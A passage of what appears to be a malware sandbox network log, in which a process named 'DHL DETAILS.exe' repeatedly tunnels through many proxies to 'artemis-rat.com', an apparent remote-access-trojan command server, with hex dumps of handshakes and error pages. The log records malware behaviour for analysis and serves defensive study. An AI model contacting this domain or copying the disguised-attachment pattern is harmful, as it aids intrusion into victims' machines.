                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    882192.168.2.551883157.230.33.2580006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.723181963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.067135096 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    883192.168.2.55283954.248.238.110806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.724337101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.995163918 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:16.037009001 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 96 95 47 8e d4 17 e9 8f 06 9e 94 46 de 2b 4e bc 98 b2 ba d4 66 3a 49 5b 3a 5e cb 76 6b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRGF+Nf:I[:^vk*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:16.307312965 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 d4 61 42 e0 f6 4b c1 8c 11 8f 37 d0 c8 84 75 b3 fb 74 89 cb e9 6f 5f 91 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9aBK7uto_DOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa
                                                                                    Mar 9, 2024 13:14:16.345767975 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 95 73 83 4e 0d 22 6d e4 54 08 38 c3 33 04 a6 c0 e5 0e 83 39 dd b0 5d 8b 51 5c e2 5f 67 2b dd 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b9 c9 62 96 3c 2a 06 b6 a8 f9 4a d4 96 4e 9f e3 52 c2 50 d0 43
                                                                                    Data Ascii: %! sN"mT839]Q\_g+P(b<*JNRPCTXJ
                                                                                    Mar 9, 2024 13:14:16.614114046 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 50 1c 06 3b b3 6d 47 81 1b 75 0a 0e 62 7a f7 8e 90 da c7 32 15 5e 06 f1 ee fb 8c 83 50 85 a8 f4 17 2f e5 15 50 bd a3 39
                                                                                    Data Ascii: (P;mGubz2^P/P9


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    884192.168.2.55020337.32.98.160384406352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.739391088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.833159924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833997011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.833096027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    885192.168.2.55282943.128.107.25188886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.755089998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.112476110 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    886192.168.2.55285772.210.221.22341456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.758192062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    887192.168.2.552865192.252.216.8141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.760265112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    888192.168.2.552968104.23.126.8806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.761841059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.916276932 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    889192.168.2.552738146.190.85.7931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.765194893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.265734911 CET536INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/4.6
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3773
                                                                                    X-Squid-Error: ERR_DNS_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    890192.168.2.551748128.199.165.63335746352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.765261889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.833291054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833997011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    891192.168.2.55285151.15.247.93163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.765331030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    892192.168.2.552973104.17.37.235806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.765336037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.919801950 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    893192.168.2.552613117.160.250.132806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.780132055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.973855019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.703419924 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    894192.168.2.552459117.160.250.16399996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.781481981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.502624035 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    895192.168.2.55287070.166.167.55577456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.781548023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    896192.168.2.550265163.172.169.27163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837326050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.833408117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833997011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.833096981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    897192.168.2.552858203.218.172.22580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837383986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    898192.168.2.55285539.105.27.3031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837496996 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:16.198471069 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    899192.168.2.55286058.234.116.19781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837728977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    900192.168.2.5528568.222.164.205156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837800026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    901192.168.2.55286851.210.223.930006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837805986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    902192.168.2.55285045.11.95.16660026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.837857008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    903192.168.2.552992192.154.244.9290006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.838527918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    904192.168.2.552994162.159.241.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
